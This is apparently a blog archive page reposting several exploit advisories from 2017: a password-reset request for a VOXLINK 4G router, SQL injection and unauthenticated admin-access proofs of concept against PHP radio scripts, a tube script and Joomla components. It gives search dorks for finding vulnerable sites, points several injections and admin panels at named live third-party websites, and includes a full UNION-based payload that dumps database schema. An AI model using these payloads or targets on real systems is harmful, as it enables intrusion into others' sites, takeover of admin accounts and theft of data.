Langsung ke konten utama

Postingan

Menampilkan postingan dari Agustus, 2017

VOXLINK Unlocked 4G LTE admin Password Reset

Exploit Title: VOXLINK Unlocked 4G LTE admin Password Reset



# Author: SellerPwnd



# Date: [2017-03-13]



# Tested on: Windows 7



# Product Vendor: http://www.voxlink.com.cn



###########################################################################################



Changing The Password is Very Easy



Go To:



http://192.168.199.1/cgi-bin/set_sys_basic.cgi



Tamper it and Add This Post Data



ipt_new_pass=admin



And Now You Can Login With The Password admin

Victor Muller v 2014 & 2015 sql injection vulnerability

========================================================================

| # Title     : Victor Muller v 2014 & 2015 sql injection vulnerability

| # Author    : Cyclo'sTextovert

| # email     : defacertersakiti@gmail.com

| # Tested on : windows 8.1 Français V.(Pro)

| # Version   : v 2014 & 2015

| # Vendor    : maniacscientist@gmail.com

| # Dork      : "Victor Muller © 2015"   shows.php?id=

========================================================================



poc :



http://www.tessa.lv/shows.php?id=125 ( inject her )



admin panel :



http://www.tessa.lv/admin/

CH Radyo v.2 php script SQl injection vulnerability

========================================================================

| # Title     : CH Radyo v.2 php script SQl injection vulnerability

| # Author    : Cyclo'sTextovert

| # email     : defacertersakiti@gmail.com

| # Tested on : windows 8.1 Français V.(Pro)

| # Version   : v.2

| # Vendor    : http://www.scripti.org/script_ch-radyo-scripti_3292_27.html

| # Dork      : "index.html?soru="

========================================================================



poc :





http://www.kissradyo.com/index.html?soru=15( inject her )

BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability

========================================================================

| # Title     : BozukRadyo v3.0 Unauthenticated Administrative Access vulnerability

| # Author    : Cyclo'sTextovert

| # email     : defacertersakiti@gmail.com

| # Tested on : windows 8.1 Français V.(Pro)

| # Version   : v3.0

| # Vendor    : http://wmscripti.com/php-scriptler/bozukradyo-v3-radyo-scripti.html

| # Dork      : n/a

========================================================================



poc :



choose a target and add payload "panel/ayarlar.php"



1 - http://hitmusic.gen.tr/panel/ayarlar.php



2 - open pag source in line 121 to found pass of databass encrypted

Bloly version 1.3 SQl injection vulnerability

========================================================================

| # Title     : Bloly version 1.3 SQl injection vulnerability

| # Author    : Cyclo'sTextovert

| # email     : defacertersakiti@gmail.com

| # Tested on : windows 8.1 Français V.(Pro)

| # Version   : 1.3

| # Vendor    : http://www.bloly.com/download.php

| # Dork      : "Bloly v1.3 by SoftCab Inc"

========================================================================



poc :





http://pcswebsites.com/search.php?page=%5c&q=1( inject her )

Automagick Tube Script version 1.4.4 Application

========================================================================

| # Title     : Automagick Tube Script version 1.4.4 Application error message vulnerability

| # Author    : Cyclo'sTextovert

| # email     : defacertersakiti@gmail.com

| # Tested on : windows 8.1 Français V.(Pro)

| # Version   : 1.4.4

| # Vendor    : http://automagick.com/

| # Dork      : .:: © Copyright 2008-2013 - Automagick Tube Script - All Rights Reserved ::.

========================================================================



poc :



choose a target and add "index.php?module=videos&tag[]=Search"



http://www.xxxsexvideos.tv/index.php?module=videos&tag[]=Search

Joomla! Component SIMGenealogy v2.1.5 - SQL Injection

# # # # #
#
# Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
#
# Dork: N/A
#
# Date: 02.08.2017
#
# Vendor : https://www.simbunch.com/ $
# Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
#
# Demo: https://www.simbunch.com/demos/simgenealogy
#
# Version: 2.1.5
# # # # #
#
# # #
# Author: Cyclo'sTextovert
#
# # # #
# #
# # SQL Injection/Exploit :
#
# http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL] # Etc..
#
# # # # #

Joomla PHP-Bridge 1.2.3 SQL Injection

# # # # ## # Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection # Dork: N/A # Date: 02.08.2017 # Vendor : http://www.henryschorradt.de/ # Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/ # Demo: http://www.henryschorradt.de/joomla-php-bridge/ # Version: 1.2.3 # # # # # # Author: Cyclo'sTextovert# # # # # ## # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL] # -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+- # Etc..# # # # # #